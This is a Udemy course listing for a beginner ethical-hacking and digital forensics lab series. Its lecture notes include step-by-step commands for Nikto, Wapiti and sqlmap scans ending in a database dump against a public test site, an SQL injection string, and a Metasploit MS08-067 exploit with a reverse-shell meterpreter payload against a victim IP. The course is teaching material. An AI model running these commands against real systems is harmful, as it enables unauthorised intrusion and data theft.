Name: Beginner's Course in System Security & Digital Forensics..
Rating: 3.9 (117 reviews)

Udemy Business

Teach on Udemy

Turn what you know into an opportunity and reach millions around the world.

Learn More

Your cart is empty.

Keep shopping

Created bySridhar Iyer

Last updated 1/2021

English

What you'll learn

Basics of System Security and Digital Forensics
Hands on Practical sessions

Course content

13 sections • 24 lectures • 4h 30m total length

Introduction to the course7:25
Hello Everyone, I am Assistant Professor Mr. Sridhar Iyer, working with the University of Mumbai for the last 6 years. I always believe in "Sharing Knowledge". I am rolling out a series of Video Tutorial Hands-On sessions on upcoming technologies and academic subjects based on my expertise and comfort. I am beginning with lab sessions on a fairly new subject "Advanced System Security and Digital Forensics". I am a Certified Ethical Hacker by E.C. Council USA and have my core expertise in Cryptography and System Security. I believe in sharing whatever knowledge and experience I have gained so far in my short but sweet stint as a Teacher. I hope this series of lectures and lab sessions help you learn something useful and interesting.

Prerequisites for the course4:00
Presenting you the very first video of the "Video Tutorial Lecture Series on - Advanced System Security and Digital Forensics". This video discusses about the various prerequisites for this course.
The software tools required could be found here :
1. VMWARE(TRIAL VERSION)
2. ORACLE VIRTUAL BOX
3. KALI LINUX OS
4. UBUNTU OS

So gear up and be ready with the tools until we meet again with the 1st Hands- On Session.

Perform Static Code Analysis Using an Open Source tool FLAWFINDER8:20
Static code analysis using open source tools like RATS, Flawfinder etc

Steps

1: Download Flawfinder tool from

https://dwheeler.com/flawfinder/

2: Download and install Anaconda Python Distribution version 3.7

https://www.anaconda.com/distribution/

2. Open Anaconda Prompt
3. Install Flawfinder

pip install flawfinder

4. Open the file in Flawfinder
5. Analyse the static code.

Vulnerability Scanning using Nikto10:12
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.

Steps

1. nikto --help
2. nikto -h http://testphp.vulnweb.com/ -p 80
3. nikto -h http://testphp.vulnweb.com/ -p 80 -o results -F txt

Wapiti Part16:25
Aim : Explore Web application vulnerabilities using Wapiti Wapiti allows you to audit the security of your websites or web applications. It performs "black-box" scans (it does not study the source code) of the web application by crawling the WebPages of the deployed webapp, looking for scripts and forms where it can inject data. Once it gets the list of URLs, forms and their inputs, Wapiti acts like a fuzzer, injecting payloads to see if a script is vulnerable.
Wapiti Part 25:51
Steps
1. Open Anaconda Prompt
2. pip install wapiti3
3. wapiti --list
4. wapiti -u http://testphp.vulnweb.com/

SQLMap Part 112:08
SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application's database server. The vulnerability is one of the oldest, most prevalent and most dangerous of web application vulnerabilities.

Example "SELECT name FROM user where username = '" + username + "' and password = '" + password + "'";
Normal Scenario "SELECT name FROM user where username = ' " + username + " ' and password = ' " + password + " ' ";
Vulnerable Scenario "SELECT name FROM user where username = ' " + username + " ' and password = ' " unknown' or '1'='1" '";
SQLMap Part 213:33
Steps
1. $ sudo apt-get install sqlmap ( for linux )
2. $ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
3. $ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D "databaseName" -- tables
4. $ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D "databaseName" -T "TableName" --columns
5. $ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D "databaseName" -T "TableName" -C "ColumnName" -- dump
SQLiLABS6:32

Metasploit Part 115:11
In this section we’ll walk you through the act of exploiting a live install of Windows XP Service Pack 3. We’ll make use of the well known vulnerability in the netapi32.dll in the Windows Operating System.

The vulnerability is in fact very dangerous because the attacker is not required to authenticate to the target machine prior to running the attack.
Metasploit Part 25:57
Steps

1. Choosing and configuring an exploit
(code that enters a target system by taking advantage of one of its bugs)

2. Choosing and configuring a payload
(code that will be executed on the target system upon successful entry)

3. Executing the exploit.

COMMANDS:

1. service postgresql start
2. msfconsole
3. show exploits
4. use windows/smb/ms08_067_netapi
5. show options
6. set RHOST "Victim's IP"
7. set payload windows/meterpreter/reverse_tcp
8. set LHOST "Your IP"
9. exploit
10. "Yippee You are inside th victim's machine"
pwd, mkdir, cat
Introduction to Packet Sniffing4:37
Packet Sniffing Using Wireshark6:57
Introduction to ARP Spoofing8:59
ARP Spoofing/Poisoning using Ettercap7:39

Part 1: Routing Information Protocol (RIP)14:51
Steps:
1. Create the network in CPT as per the diagram.
2. Apply Routing Information Protocol (RIP)
3. Create Access Control Lists (ACL)
4. Create a Virtual LAN (VLAN).
Part 2 : Access Control Lists (ACL)12:08
Steps:
1. Create the network in CPT as per the diagram.
2. Apply Routing Information Protocol (RIP)
3. Create Access Control Lists (ACL)
4. Create a Virtual LAN (VLAN). ACCESS LISTS :
1. Standard Access List (1-99) Applied Closest to the destination
2. Extended Access List (100-199) Applied Closest to the source
Part 3: Virtual LAN (VLAN)13:31
1. Create 3 VLANS ( Vlan 10 Vlan 20, Vlan 30)
2. Switch 2 - Vlan 20
name sales
exit
Vlan 30
name sales
exit

int fa0/1
switchport access vlan20
exit
int fa0/2
switchport access vlan20
exit
int fa0/3
switchport access vlan30
exit
int fa0/4
switchport access vlan30
exit

Requirements

Basic Programming knowledge.
A computer with internet connectivity.

Description

Hello Everyone, I am Assistant Professor Mr. Sridhar Iyer, working with the University of Mumbai for the last 7 years. I always believe in "Sharing Knowledge".

I am rolling out a series of Video Tutorial Hands-On sessions on upcoming technologies and academic subjects based on my expertise and comfort.

I am beginning with lab sessions on a fairly new subject "Advanced System Security and Digital Forensics". I am a Certified Ethical Hacker by E.C. Council USA and have my core expertise in Cryptography and System Security.

I believe in sharing whatever knowledge and experience I have gained so far in my short but sweet stint as a Teacher.

I hope this series of lectures and lab sessions help you learn something useful and interesting.

Who this course is for:

Students interested in the field of information security
Students interested in learning basic ethical hacking and reconnaissance of a network
Students interested in learning digital forensics

What you'll learn

Explore related topics

Course content

Introduction1 lecture • 7min

Prerequisites for the course1 lecture • 4min

Experiment No 1 : Perform Static Code Analysis Using an Open Source tool FLAWFIN1 lecture • 8min

Experiment No 2: Vulnerability Scanning using Nikto1 lecture • 10min

Experiment No 3: To explore a website copier HTTrack1 lecture • 7min

Experiment No 4: Explore Web application vulnerabilities using Wapiti2 lectures • 12min

Experiment No 5: Perform SQL Injection3 lectures • 32min

Experiment No 6: Penetration Testing6 lectures • 49min

Experiment No 7: Network Security3 lectures • 41min

Experiment No 8 : Virtual Private Networks1 lecture • 27min

Requirements

Description

Who this course is for: